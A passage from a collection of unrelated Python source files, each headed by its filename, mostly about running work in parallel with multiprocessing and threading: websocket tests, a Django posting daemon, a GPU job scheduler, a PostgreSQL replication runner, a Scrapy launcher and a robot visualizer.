workdir=workdir, port=port, device=self._device_name) if self._fetch_names is None: self._fetch_names = server.get_fetch_list() return server def _start_one_server(self, service_idx): """ Start one server Args: service_idx: server index Returns: None """ self._rpc_service_list[service_idx].run_server() def prepare_server(self): """ Prepare all servers to be started, and append them into list. """ for i, device_id in enumerate(self._devices): if self._workdir != "": workdir = "{}_{}".format(self._workdir, i) else: workdir = _workdir_name_gen.next() self._rpc_service_list.append( self._prepare_one_server( workdir, self._port_list[i], device_id, thread_num=self._thread_num, mem_optim=self._mem_optim, ir_optim=self._ir_optim, precision=self._precision)) def start_server(self): """ Start multiple processes and start one server in each process """ for i, _ in enumerate(self._rpc_service_list): p = multiprocessing.Process( target=self._start_one_server, args=(i, )) p.daemon = True self._server_pros.append(p) for p in self._server_pros: p.start()
social_media_poster.py
# # Daemon to post all queued up notifications and social media posts # from django.core.management.base import BaseCommand from django.db import connection from django.utils import autoreload import sys import threading import select from postgresqleu.util.messaging.sender import send_pending_messages, send_pending_posts from postgresqleu.util.messaging import ProviderCache class Command(BaseCommand): help = 'Daemon to post notification and social media posts' def handle(self, *args, **options): # Automatically exit if our own code changes. # This is not based on a published API, so quite likely will fail # and need to be updated in a future version of django # Start our work in a background thread bthread = threading.Thread(target=self.inner_handle) bthread.setDaemon(True) bthread.start() reloader = autoreload.get_reloader() while not reloader.should_stop: reloader.run(bthread) self.stderr.write("Underlying code changed, exiting for a restart") sys.exit(0) def inner_handle(self): with connection.cursor() as curs: curs.execute("LISTEN pgeu_notification") curs.execute("LISTEN pgeu_broadcast") curs.execute("SET application_name = 'pgeu messages/media poster'") while True: providers = ProviderCache() send_pending_messages(providers) send_pending_posts(providers) self.eat_notifications() # Wake up to check if there is something to do every 5 minutes, just in case select.select([connection.connection], [], [], 5 * 60) def eat_notifications(self): connection.connection.poll() while connection.connection.notifies: connection.connection.notifies.pop()
test_websocket.py
from uvicorn.protocols.http.h11_impl import H11Protocol from uvicorn.protocols.websockets.websockets_impl import WebSocketProtocol from uvicorn.protocols.websockets.wsproto_impl import WSProtocol import asyncio import functools import time import threading import requests import pytest import websockets from contextlib import contextmanager class WebSocketResponse: def __init__(self, scope): self.scope = scope async def __call__(self, receive, send): self.send = send while True: message = await receive() message_type = message["type"].replace(".", "_") handler = getattr(self, message_type, None) if handler is not None: await handler(message) if message_type == 'websocket_disconnect': break def run_loop(loop): loop.run_forever() loop.close() @contextmanager def run_server(app, protocol_cls): tasks = set() asyncio.set_event_loop(None) loop = asyncio.new_event_loop() protocol = functools.partial(H11Protocol, app=app, loop=loop, tasks=tasks, ws_protocol_class=protocol_cls) create_server_task = loop.create_server(protocol, host="127.0.0.1") server = loop.run_until_complete(create_server_task) url = "ws://127.0.0.1:%d/" % server.sockets[0].getsockname()[1] try: # Run the event loop in a new thread. thread = threading.Thread(target=run_loop, args=[loop]) thread.start() # Return the contextmanager state. yield url finally: # Close the loop from our main thread. while tasks: time.sleep(0.01) loop.call_soon_threadsafe(loop.stop) thread.join() @pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol]) def test_invalid_upgrade(protocol_cls): app = lambda scope: None with run_server(app, protocol_cls=protocol_cls) as url: url = url.replace("ws://", "http://") response = requests.get( url, headers={"upgrade": "websocket", "connection": "upgrade"}, timeout=5 ) assert response.status_code == 400 assert response.text in [ 'Missing Sec-WebSocket-Version header', # websockets 'Missing or empty Sec-WebSocket-Key header\n' # wsproto ] @pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol]) def test_accept_connection(protocol_cls): class App(WebSocketResponse): async def websocket_connect(self, message): await self.send({"type": "websocket.accept"}) async def open_connection(url): async with websockets.connect(url) as websocket: return websocket.open with run_server(App, protocol_cls=protocol_cls) as url: loop = asyncio.new_event_loop() is_open = loop.run_until_complete(open_connection(url)) assert is_open loop.close() @pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol]) def test_close_connection(protocol_cls): class App(WebSocketResponse): async def websocket_connect(self, message): await self.send({"type": "websocket.close"}) async def open_connection(url): try: await websockets.connect(url) except websockets.exceptions.InvalidHandshake: return False return True with run_server(App, protocol_cls=protocol_cls) as url: loop = asyncio.new_event_loop() is_open = loop.run_until_complete(open_connection(url)) assert not is_open loop.close() @pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol]) def test_send_text_data_to_client(protocol_cls): class App(WebSocketResponse): async def websocket_connect(self, message): await self.send({"type": "websocket.accept"}) await self.send({"type": "websocket.send", "text": "123"}) async def get_data(url): async with websockets.connect(url) as websocket: return await websocket.recv() with run_server(App, protocol_cls=protocol_cls) as url: loop = asyncio.new_event_loop() data = loop.run_until_complete(get_data(url)) assert data == "123" loop.close() @pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol]) def test_send_binary_data_to_client(protocol_cls): class App(WebSocketResponse): async def websocket_connect(self, message): await self.send({"type": "websocket.accept"}) await self.send({"type": "websocket.send", "bytes": b"123"}) async def get_data(url): async with websockets.connect(url) as websocket: return await websocket.recv() with run_server(App, protocol_cls=protocol_cls) as url: loop = asyncio.new_event_loop() data = loop.run_until_complete(get_data(url)) assert data == b"123" loop.close() @pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol]) def test_send_and_close_connection(protocol_cls): class App(WebSocketResponse): async def websocket_connect(self, message): await self.send({"type": "websocket.accept"}) await self.send({"type": "websocket.send", "text": "123"}) await self.send({"type": "websocket.close"}) async def get_data(url): async with websockets.connect(url) as websocket: data = await websocket.recv() is_open = True try: await websocket.recv() except: is_open = False return (data, is_open) with run_server(App, protocol_cls=protocol_cls) as url: loop = asyncio.new_event_loop() (data, is_open) = loop.run_until_complete(get_data(url)) assert data == "123" assert not is_open loop.close() @pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol]) def test_send_text_data_to_server(protocol_cls): class App(WebSocketResponse): async def websocket_connect(self, message): await self.send({"type": "websocket.accept"}) async def websocket_receive(self, message): _text = message.get("text") await self.send({"type": "websocket.send", "text": _text}) async def send_text(url): async with websockets.connect(url) as websocket: await websocket.send("abc") return await websocket.recv() with run_server(App, protocol_cls=protocol_cls) as url: loop = asyncio.new_event_loop() data = loop.run_until_complete(send_text(url)) assert data == "abc" loop.close() @pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol]) def test_send_binary_data_to_server(protocol_cls): class App(WebSocketResponse): async def websocket_connect(self, message): await self.send({"type": "websocket.accept"}) async def websocket_receive(self, message): _bytes = message.get("bytes") await self.send({"type": "websocket.send", "bytes": _bytes}) async def send_text(url): async with websockets.connect(url) as websocket: await websocket.send(b"abc") return await websocket.recv() with run_server(App, protocol_cls=protocol_cls) as url: loop = asyncio.new_event_loop() data = loop.run_until_complete(send_text(url)) assert data == b"abc" loop.close() @pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol]) def test_send_after_protocol_close(protocol_cls): class App(WebSocketResponse): async def websocket_connect(self, message): await self.send({"type": "websocket.accept"}) await self.send({"type": "websocket.send", "text": "123"}) await self.send({"type": "websocket.close"}) with pytest.raises(Exception): await self.send({"type": "websocket.send", "text": "123"}) async def get_data(url): async with websockets.connect(url) as websocket: data = await websocket.recv() is_open = True try: await websocket.recv() except: is_open = False return (data, is_open) with run_server(App, protocol_cls=protocol_cls) as url: loop = asyncio.new_event_loop() (data, is_open) = loop.run_until_complete(get_data(url)) assert data == "123" assert not is_open loop.close() @pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol]) def test_missing_handshake(protocol_cls): class App: def __init__(self, scope): pass async def __call__(self, receive, send): pass async def connect(url): await websockets.connect(url) with run_server(App, protocol_cls=protocol_cls) as url: loop = asyncio.new_event_loop() with pytest.raises(websockets.exceptions.InvalidStatusCode) as exc: loop.run_until_complete(connect(url)) assert exc.value.status_code == 500 loop.close() @pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol]) def test_send_before_handshake(protocol_cls): class App: def __init__(self, scope): pass async def __call__(self, receive, send): await send({"type": "websocket.send", "text": "123"}) async def connect(url): await websockets.connect(url) with run_server(App, protocol_cls=protocol_cls) as url: loop = asyncio.new_event_loop() with pytest.raises(websockets.exceptions.InvalidStatusCode) as exc: loop.run_until_complete(connect(url)) assert exc.value.status_code == 500 loop.close() @pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol]) def test_duplicate_handshake(protocol_cls): class App: def __init__(self, scope): pass async def __call__(self, receive, send): await send({"type": "websocket.accept"}) await send({"type": "websocket.accept"}) async def connect(url): async with websockets.connect(url) as websocket: data = await websocket.recv() with run_server(App, protocol_cls=protocol_cls) as url: loop = asyncio.new_event_loop() with pytest.raises(websockets.exceptions.ConnectionClosed) as exc: loop.run_until_complete(connect(url)) assert exc.value.code == 1006 loop.close() @pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol]) def test_asgi_return_value(protocol_cls): """ The ASGI callable should return 'None'. If it doesn't make sure that the connection is closed with an error condition. """ class App: def __init__(self, scope): pass async def __call__(self, receive, send): await send({"type": "websocket.accept"}) return 123 async def connect(url): async with websockets.connect(url) as websocket: data = await websocket.recv() with run_server(App, protocol_cls=protocol_cls) as url: loop = asyncio.new_event_loop() with pytest.raises(websockets.exceptions.ConnectionClosed) as exc: loop.run_until_complete(connect(url)) assert exc.value.code == 1006 loop.close() @pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol]) def test_app_close(protocol_cls): class App: def __init__(self, scope): pass async def __call__(self, receive, send): while True: message = await receive() if message['type'] == 'websocket.connect': await send({"type": "websocket.accept"}) elif message['type'] == 'websocket.receive': await send({"type": "websocket.close"}) elif message['type'] == 'websocket.disconnect': break async def websocket_session(url): async with websockets.connect(url) as websocket: await websocket.ping() await websocket.send('abc') await websocket.recv() with run_server(App, protocol_cls=protocol_cls) as url: loop = asyncio.new_event_loop() with pytest.raises(websockets.exceptions.ConnectionClosed) as exc: loop.run_until_complete(websocket_session(url)) assert exc.value.code == 1000 loop.close() @pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol]) def test_client_close(protocol_cls): class App: def __init__(self, scope): pass async def __call__(self, receive, send): while True: message = await receive() if message['type'] == 'websocket.connect': await send({"type": "websocket.accept"}) elif message['type'] == 'websocket.receive': pass elif message['type'] == 'websocket.disconnect': break async def websocket_session(url): async with websockets.connect(url) as websocket: await websocket.ping() await websocket.send('abc') with run_server(App, protocol_cls=protocol_cls) as url: loop = asyncio.new_event_loop() loop.run_until_complete(websocket_session(url)) loop.close() @pytest.mark.parametrize("protocol_cls", [WebSocketProtocol, WSProtocol]) @pytest.mark.parametrize("subprotocol", ["proto1", "proto2"]) def test_subprotocols(protocol_cls, subprotocol): class App(WebSocketResponse): async def websocket_connect(self, message): await self.send({"type": "websocket.accept", "subprotocol": subprotocol}) async def get_subprotocol(url): async with websockets.connect( url, subprotocols=["proto1", "proto2"] ) as websocket: return websocket.subprotocol with run_server(App, protocol_cls=protocol_cls) as url: loop = asyncio.new_event_loop() accepted_subprotocol = loop.run_until_complete(get_subprotocol(url)) assert accepted_subprotocol == subprotocol loop.close()
compare_Walltoall_adam_1layers.py
import qiskit import numpy as np import sys sys.path.insert(1, '../') import qtm.base, qtm.constant, qtm.nqubit, qtm.fubini_study, qtm.encoding import importlib import multiprocessing importlib.reload(qtm.base) importlib.reload(qtm.constant) importlib.reload(qtm.onequbit) importlib.reload(qtm.nqubit) importlib.reload(qtm.fubini_study) def run_walltoall(num_layers, num_qubits): n_walltoall = qtm.nqubit.calculate_n_walltoall(num_qubits) thetas = np.ones(num_layers* 3 * num_qubits + num_layers*n_walltoall) psi = 2*np.random.rand(2**num_qubits)-1 psi = psi / np.linalg.norm(psi) qc = qiskit.QuantumCircuit(num_qubits, num_qubits) qc.initialize(psi, range(0, num_qubits)) loss_values = [] thetass = [] for i in range(0, 400): if i % 20 == 0: print('W_alltoall: (' + str(num_layers) + ',' + str(num_qubits) + '): ' + str(i)) grad_loss = qtm.base.grad_loss( qc, qtm.nqubit.create_Walltoall_layerd_state, thetas, num_layers = num_layers) if i == 0: m, v = list(np.zeros(thetas.shape[0])), list( np.zeros(thetas.shape[0])) thetas = qtm.base.adam(thetas, m, v, i, grad_loss) thetass.append(thetas.copy()) qc_copy = qtm.nqubit.create_Walltoall_layerd_state(qc.copy(), thetas, num_layers) loss = qtm.base.loss_basis(qtm.base.measure(qc_copy, list(range(qc_copy.num_qubits)))) loss_values.append(loss) traces = [] fidelities = [] for thetas in thetass: # Get |psi~> = U_target|000...> qc = qiskit.QuantumCircuit(num_qubits, num_qubits) qc = qtm.nqubit.create_Walltoall_layerd_state(qc, thetas, num_layers = num_layers).inverse() psi_hat = qiskit.quantum_info.Statevector.from_instruction(qc) # Calculate the metrics trace, fidelity = qtm.base.get_metrics(psi, psi_hat) traces.append(trace) fidelities.append(fidelity) print('Writting ... ' + str(num_layers) + ' layers,' + str(num_qubits) + ' qubits') np.savetxt("../../experiments/tomography/tomography_walltoall_" + str(num_layers) + "/" + str(num_qubits) + "/loss_values_adam.csv", loss_values, delimiter=",") np.savetxt("../../experiments/tomography/tomography_walltoall_" + str(num_layers) + "/" + str(num_qubits) + "/thetass_adam.csv", thetass, delimiter=",") np.savetxt("../../experiments/tomography/tomography_walltoall_" + str(num_layers) + "/" + str(num_qubits) + "/traces_adam.csv", traces, delimiter=",") np.savetxt("../../experiments/tomography/tomography_walltoall_" + str(num_layers) + "/" + str(num_qubits) + "/fidelities_adam.csv", fidelities, delimiter=",") if __name__ == "__main__": # creating thread num_layers = [1] num_qubits = [2, 3, 4, 5, 6] t_walltoalls = [] for i in num_layers: for j in num_qubits: t_walltoalls.append(multiprocessing.Process(target = run_walltoall, args=(i, j))) for t_walltoall in t_walltoalls: t_walltoall.start() for t_walltoall in t_walltoalls: t_walltoall.join() print("Done!")
server.py
"""Small example OSC server This program listens to several addresses, and prints some information about received packets. """ import argparse import math import threading from pythonosc import dispatcher from pythonosc import osc_server import sys # insert at 1, 0 is the script path (or '' in REPL) # sys.path.insert(1, '/home/pi/otherwise_bpi/test_and_examples') # from LED_brightness import * from LED_Light.LED_Light import LED_Light dispatcher = dispatcher.Dispatcher() light = LED_Light() class Server: def __init__(self, ip = "192.168.1.16", port = 5005): self.ip = ip self.port = port self.server_thread = threading.Thread(target=listen_for_osc,kwargs={"ip":ip,"port":port}) self.server_thread.start() pass def close(self): light.close() self.server_thread.join() pass def print_brightness_handler(unused_addr, args, brightness): print("[{0}] ~ {1}".format(args[0], brightness)) light.set_brightness(brightness) def print_compute_handler(unused_addr, args, brightness): try: print("[{0}] ~ {1}".format(args[0], args[1](brightness))) except ValueError: pass def listen_for_osc(ip="192.168.1.16", port=5005): # global dispatcher dispatcher.map("/brightness", print_brightness_handler, "brightness") server = osc_server.ThreadingOSCUDPServer((ip, port), dispatcher) print("Serving on {}".format(server.server_address)) server.serve_forever()
client.py
import time import requests import random import threading from multiprocessing import Pool s = requests.session() def post_result(mid): start = time.time() data = { "total_pay": 0, "level": 2, "mid": mid, "machine": "FuFuRiches", "avatar_url": "", "vip_level": 0, "balance": 101660, "bet": 500 } r = s.post('http://127.0.0.1:8081/test', json=data, timeout=10).json() timer = time.time() - start print('resp_time:{}'.format(timer)) def multi_process(): p = Pool(200) i = 149500 for _ in range(1): p.map(post_result, [i for i in range(i, i+200)]) def multi_thread(): ths = [] for i in range(200): t = threading.Thread(target=post_result, args=(i,)) ths.append(t) print('begin start') for t in ths: t.start() print('begin join...') for t in ths: t.join() if __name__ == '__main__': start = time.time() multi_process() # multi_thread() print(time.time() - start) # 200 + gevent + gunicorn + flask """ resp_time:1.4399609565734863 resp_time:1.3442130088806152 resp_time:1.2940950393676758 resp_time:1.534102201461792 resp_time:1.3304438591003418 """ # 20 gunicorn + gevent + flask """ resp_time:0.10559415817260742 resp_time:0.11883115768432617 resp_time:0.10376501083374023 resp_time:0.11776995658874512 """ # 20 gunicorn + flask """ resp_time:0.08155584335327148 resp_time:0.08160281181335449 resp_time:0.0867300033569336 """ # 200 gunicorn + flask """ resp_time:0.850884199142456 resp_time:0.8485920429229736 resp_time:0.8648147583007812 resp_time:0.8581891059875488 resp_time:0.9136908054351807 """
run_it.py
# -*- coding: utf-8 -*- # @Time : 2021/3/6 # @Author : Lart Pang # @GitHub : https://github.com/lartpang import argparse import subprocess import time from enum import Enum from multiprocessing import Process import pynvml pynvml.nvmlInit() # SOME CONSTANT class STATUS(Enum): NORMAL = 0 CMD_INVALID = 1 GPU_BUSY = 2 class MyProcess: slot_idx = -1 curr_task_id = 0 def __init__( self, interpreter_path, gpu_id, verbose=True, stdin=None, stdout=None, stderr=None, num_cmds=None, max_used_ratio=0.5 ): super().__init__() self.gpu_id = gpu_id self.interpreter_path = interpreter_path self.verbose = verbose self.num_cmds = num_cmds self.stdin = stdin self.stdout = stdout self.stderr = stderr self.sub_proc = None self.proc = None self.gpu_handler = pynvml.nvmlDeviceGetHandleByIndex(gpu_id) self.max_used_ratio = max_used_ratio MyProcess.slot_idx += 1 def __str__(self): return f"[ID {self.slot_idx} INFO] NEW PROCESS SLOT ON GPU {self.gpu_id} IS CREATED!" def _used_ratio(self, used, total): return used / total def get_used_mem(self, return_ratio=False): meminfo = pynvml.nvmlDeviceGetMemoryInfo(self.gpu_handler) if return_ratio: return self._used_ratio(meminfo.used, meminfo.total) return meminfo.used def _create_sub_proc(self, cmd=""): self.sub_proc = subprocess.Popen( args=f"CUDA_VISIBLE_DEVICES={self.gpu_id} {self.interpreter_path} -u {cmd}", stdin=self.stdin, stdout=self.stdout, stderr=self.stderr, shell=True, executable="bash", env=None, close_fds=True, bufsize=1, text=True, encoding="utf-8", ) print(f"[NEW TASK PID: {self.sub_proc.pid}] {self.sub_proc.args}") if self.verbose: if self.stdout is not None and self.sub_proc is not None: for l in self.sub_proc.stdout: print(f"[ID: {self.curr_task_id}/{self.num_cmds} GPU: {self.gpu_id}] {l}", end="") def create_and_start_proc(self, cmd=None): if (used_mem := self.get_used_mem(return_ratio=True)) > self.max_used_ratio: # TODO: # 当前的判定方式并不是太准确。最好的方式是由程序提供设置周期数的选项(`--num-epochs`), # 首先按照num_epoch=1来进行初步的运行,并统计各个命令对应使用的显存。 # 之后根据这些程序实际使用的显存来安排后续的操作。 # 这可能需要程序对输出可以实现覆盖式(`--overwrite`)操作。 self.status = STATUS.GPU_BUSY print( f"[ID {self.slot_idx} WARN] the memory usage of the GPU {self.gpu_id} is currently {used_mem}, " f"which exceeds the maximum threshold {self.max_used_ratio}." ) return print(f"[ID {self.slot_idx} INFO] {cmd}") MyProcess.curr_task_id += 1 self.proc = Process(target=self._create_sub_proc, kwargs=dict(cmd=cmd)) self.proc.start() # 只有成功创建并启动了进城后才改变状态 self.status = STATUS.NORMAL def is_alive(self): if self.status == STATUS.NORMAL: return self.proc.is_alive() return False def read_cmds_from_txt(path): with open(path, encoding="utf-8", mode="r") as f: cmds = [] for line in f: line = line.strip() if line: cmds.append(line) return cmds def get_args(): parser = argparse.ArgumentParser() parser.add_argument("--interpreter", type=str, required=True, help="The path of your interpreter you want to use.") parser.add_argument("--verbose", action="store_true", help="Whether to print the output of the subprocess.") parser.add_argument( "--gpu-pool", nargs="+", type=int, default=[0], help="The pool containing all ids of your gpu devices." ) parser.add_argument("--max-workers", type=int, help="The max number of the workers.") parser.add_argument( "--cmd-pool", type=str, required=True, help="The text file containing all your commands. It will be combined with `interpreter`.", ) parser.add_argument("--max-used-ratio", type=float, default=0.5, help="The max used ratio of the gpu.") args = parser.parse_args() if args.max_workers is None: args.max_workers = len(args.gpu_pool) return args def main(): args = get_args() print("[YOUR CONFIG]\n" + str(args)) cmd_pool = read_cmds_from_txt(path=args.cmd_pool) print("[YOUR CMDS]\n" + "\n".join(cmd_pool)) num_gpus = len(args.gpu_pool) print("[CREATE PROCESS OBJECTS]") proc_slots = [] for i in range(min(args.max_workers, len(cmd_pool))): # 确保slots数量小于等于命令数量 gpu_id = i % num_gpus proc = MyProcess( interpreter_path=args.interpreter, gpu_id=args.gpu_pool[gpu_id], verbose=args.verbose, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, num_cmds=len(cmd_pool), max_used_ratio=args.max_used_ratio, ) print(proc) proc_slots.append(proc) for p in proc_slots: if len(cmd_pool) == 0: # 确保出栈不会异常 break cmd = cmd_pool.pop() # 指令出栈 p.create_and_start_proc(cmd=cmd) if p.status == STATUS.GPU_BUSY: # 当前GPU显存不足,暂先跳过 cmd_pool.append(cmd) # 指令未能顺利执行,重新入栈 continue is_normal_ending = True while proc_slots: # the pool of the processes is not empty for slot_idx, p in enumerate(proc_slots): # polling if not p.is_alive(): if len(cmd_pool) == 0: # 指令均在执行或者已被执行 del proc_slots[slot_idx] print("[NO MORE COMMANDS, DELETE THE PROCESS SLOT!]") break cmd = cmd_pool.pop() p.create_and_start_proc(cmd=cmd) if p.status == STATUS.GPU_BUSY: # 当前GPU显存不足,暂先跳过 cmd_pool.append(cmd) # 指令未能顺利执行,重新入栈 continue if proc_slots and all([_p.status == STATUS.GPU_BUSY for _p in proc_slots]): # 所有GPU都被外部程序占用,直接退出。因为如果我们的程序正常执行时,状态是NORMAL print("[ALL GPUS ARE BUSY, EXIT THE LOOP!]") proc_slots.clear() is_normal_ending = False break time.sleep(1) if is_normal_ending: print("[ALL COMMANDS HAVE BEEN COMPLETED!]") if __name__ == "__main__": main()
run_refresh.py
#!/usr/bin/env python import argparse, psycopg2, sys from multiprocessing import Process mimeo_version = "1.3.0" parser = argparse.ArgumentParser(description="Script to manage running mimeo table replication with a period set in their configuration. By default, refreshes are run sequentially in ascending order of their last_run value. Parallel refreshes are supported with -j option. If type or batch_limit options are not given, all replication tables of all types scheduled will be run.") parser.add_argument('-c','--connection', default="host=", help="""Connection string for use by psycopg to connect to your database. Defaults to "host=" (local socket).""") parser.add_argument('-t','--type', choices=["snap", "inserter", "updater", "dml", "logdel", "table"], help="Must be one of the following values: snap, inserter, updater, dml, logdel, table. If you'd like to run more than one type, but not all of them, call this script separately for each type.") parser.add_argument('-b','--batch_limit', type=int, default=-1, help="An integer representing how many replication tables you want to run for this call of the script. Default is all of them that are scheduled to run.") parser.add_argument('-j','--jobs', type=int, default=0, help="Allows parallel running of replication jobs. Set this equal to the number of processors you want to use to allow that many jobs to start simultaneously. (this uses multiprocessing library, not threading)") parser.add_argument('-v', '--verbose', action="store_true", help="More detailed output.") parser.add_argument('--version', action="store_true", help="Print out the minimum version of mimeo this script is meant to work with. The version of mimeo installed may be greater than this.") args = parser.parse_args() def create_conn(): conn = psycopg2.connect(args.connection) conn.autocommit = True return conn def close_conn(conn): conn.close() def get_mimeo_schema(conn): cur = conn.cursor() sql = "SELECT nspname FROM pg_catalog.pg_namespace n, pg_catalog.pg_extension e WHERE e.extname = 'mimeo' AND e.extnamespace = n.oid" cur.execute(sql) mimeo_schema = cur.fetchone()[0] cur.close() return mimeo_schema def get_jobs(conn, mimeo_schema): # Fetch all jobs scheduled to run cur = conn.cursor() sql = "SELECT dest_table, type FROM " + mimeo_schema + ".refresh_config" if args.type != None: sql += "_" + args.type sql += " WHERE period IS NOT NULL AND (CURRENT_TIMESTAMP - last_run)::interval > period ORDER BY last_run ASC" if args.batch_limit > -1: sql += " LIMIT " + str(args.batch_limit) cur.execute(sql) result = cur.fetchall() cur.close() return result def print_version(): print(mimeo_version) sys.exit() def single_process(result, mimeo_schema): conn = create_conn() cur = conn.cursor() for i in result: if args.verbose: print("Running " + i[1] + " replication for table: " + i[0]) sql = "SELECT " + mimeo_schema + ".refresh_" + i[1] + "(%s)" cur.execute(sql, [i[0]]) cur.close() close_conn(conn) def refreshProc(dest_table, rtype, mimeo_schema): conn = create_conn() cur = conn.cursor() sql = "SELECT " + mimeo_schema + ".refresh_" + rtype + "(%s)" cur.execute(sql, [dest_table]) cur.close() close_conn(conn) if __name__ == "__main__": if args.version: print_version() conn = create_conn() mimeo_schema = get_mimeo_schema(conn) result = get_jobs(conn, mimeo_schema) close_conn(conn) if args.jobs > 0: while len(result) > 0: if args.verbose: print("Jobs left in queue: " + str(len(result))) if len(result) < args.jobs: # shorten the for loop if the number of tables to run is less than -j args.jobs = len(result) processlist = [] for num in range(0, args.jobs): i = result.pop() p = Process(target=refreshProc, args=(i[0], i[1], mimeo_schema)) p.start() if args.verbose: print("Running " + i[1] + " replication for table: " + i[0]) processlist.append(p) for j in processlist: j.join() else: single_process(result, mimeo_schema)
main.py
# coding=utf-8 from multiprocessing import Queue, Process from scrapy.utils.project import get_project_settings from twisted.internet import reactor from scrapy.crawler import CrawlerProcess from shop.spiders.markethot_spider import MarkethotSpider from shop.spiders.megadrop24_spider import Megadrop24Spider from shop.spiders.yandex_spider import YandexSpider from web.manage import runserver class CrawlRunner: def __init__(self, query, history): self.query = query self.history = history def run_spider(self): def f(q, spider): try: runner = CrawlerProcess(get_project_settings()) deferred = runner.crawl(spider, query=self.query, history=self.history) deferred.addBoth(lambda _: reactor.stop()) reactor.run() q.put(None) except Exception as e: q.put(e) for spider in [Megadrop24Spider, MarkethotSpider]: q = Queue() p = Process(target=f, args=(q, spider)) p.start() result = q.get() p.join() if result is not None: raise result if __name__ == '__main__': runserver()
visualizer.py
import numpy as np import pinocchio from pinocchio.utils import * from pinocchio.rpy import matrixToRpy, rpyToMatrix, rotate from robot_properties_solo.config import SoloConfig from loader import loadRobot import subprocess import threading import time class VisualModel(): def __init__(self,display=False): self.display=display def showGepetto(): subprocess.call(["gepetto-gui"]) if self.display: try: thread = threading.Thread(target=showGepetto) thread.start() #thread.join() except: print "Error: unable to start Gepetto-GUI thread" self.robot = loadRobot() self.model = self.robot.model self.data = self.model.createData() self.nq = self.model.nq self.nv = self.model.nv self.na = self.model.nq-7 self.dq0 = pinocchio.utils.zero(self.model.nv) self.q0 = self.model.referenceConfigurations["kneeling"] lSole = 'l_foot' rSole = 'r_foot' lKneePoint = 'l_knee_lp' rKneePoint = 'r_knee_rp' lHandPoint = 'l_hand_dp' rHandPoint = 'r_hand_dp' lToe = 'l_foot_toe' rToe = 'r_foot_toe' self.lSoleId = self.model.getFrameId(lSole) self.rSoleId = self.model.getFrameId(rSole) self.lkId = self.model.getFrameId(lKneePoint) self.rkId = self.model.getFrameId(rKneePoint) self.lhId = self.model.getFrameId(lHandPoint) self.rhId = self.model.getFrameId(rHandPoint) self.lToeId = self.model.getFrameId(lToe) self.rToeId = self.model.getFrameId(rToe) # Calibrate origin at center of knee points self.calibrateOrigin() # # Measure distance # lhPos0 = self.data.oMf[self.lhId].translation # diffPos0 = lhPos0-lkPos0 # Manual Tuning(Joint number table) # torso: 0, 1, 2, 3, 4, 5, 6 # left_leg: 7(0) l_hip_y, 8(1) l_hip_r, 9(2), 10(3), 11(4), 12(5) # left_arm: 13(6), 14(7), 15(8), 16(9) # right_leg: 17(10), 18(11), 19(12), 20(13), 21(14), 22(15) # right_arm: 23(16), 24(17), 25(18), 26(19) # l1: distance between axis of ankle roll and axis of knee # l2: distance between axis of ankle roll and toe # l3: distance between axis of knee and knee point l1 = 0.144 l2 = 0.03999 l3 = 0.014 kneeOffset = anklePitchOffset= np.arcsin((l2-l3)/l1) SE3 = pinocchio.SE3 #arm self.q0[13] = self.q0[23] = -np.pi/2 self.q0[14] = self.q0[24]= 6.0/180.*np.pi self.q0[15] = -(np.pi/2-15./180.*np.pi) self.q0[25] = np.pi/2-15./180.*np.pi self.q0[16] = self.q0[26]= (np.pi-163./180.*np.pi)#Initialize elbow position using kinematic data from [Abdolshah2018] #leg self.q0[9] = self.q0[19]= 0 self.q0[10] = self.q0[20]= -np.pi/2-kneeOffset self.q0[11] = self.q0[21]= -anklePitchOffset # start_SE3 = SE3(eye(3), np.matrix([0, 0, 0]).T)*SE3(eye(3), np.matrix([0, 0, 0]).T) # mid_SE3 = start_SE3*SE3(rotate('y', np.pi/3),zero(3))*SE3(rotate('z', np.pi/2),zero(3)) # end_SE3 = mid_SE3 * SE3(rotate('z', np.pi/2),zero(3)) # self.q0[3:7] = se3ToXYZQUAT(mid_SE3)[3:7] pinocchio.forwardKinematics(self.model, self.data, self.q0) pinocchio.updateFramePlacements(self.model, self.data) lkPos0 = self.data.oMf[self.lkId].translation ltPos0 = self.data.oMf[self.lToeId].translation self.calibrateOrigin() lhPos0 = self.data.oMf[self.lhId].translation rhPos0 = self.data.oMf[self.rhId].translation # print(self.rhId) # print(lhPos0, rhPos0) self.q0[2]+=0.000001 # increase height for pybullet simulation self.x0 = np.concatenate([self.q0, self.dq0]) self.model.defaultState = np.concatenate([self.q0, np.zeros((self.model.nv, 1))]) if display: self.show() def show(self): time.sleep(10) self.robot.initViewer(loadModel=True) self.robot.viewer.gui.addFloor('hpp-gui/floor') self.robot.display(self.q0) def calibrateOrigin(self): pinocchio.forwardKinematics(self.model, self.data, self.q0) pinocchio.updateFramePlacements(self.model, self.data) lkPos0 = self.data.oMf[self.lkId].translation rkPos0 = self.data.oMf[self.rkId].translation self.q0[:3]-=(lkPos0+rkPos0)/2 pinocchio.forwardKinematics(self.model, self.data, self.q0) pinocchio.updateFramePlacements(self.model, self.data) lkPos0 = self.data.oMf[self.lkId].translation rkPos0 = self.data.oMf[self.rkId].translation originPos0 = (lkPos0+rkPos0)/2 assert abs(originPos0[0])<1.e-6, "[Error]Origin is not zeroed in x direction!" assert abs(originPos0[1])<1.e-6, "[Error]Origin is not zeroed in y direction!" assert abs(originPos0[2])<1.e-6, "[Error]Origin is not zeroed in z direction!" def visualizeConfig(self,q): def showGepetto(): subprocess.call(["gepetto-gui"]) try: thread = threading.Thread(target=showGepetto) thread.start() #thread.join() except: print "Error: unable to start Gepetto-GUI thread" time.sleep(5) self.robot.initViewer(loadModel=True) 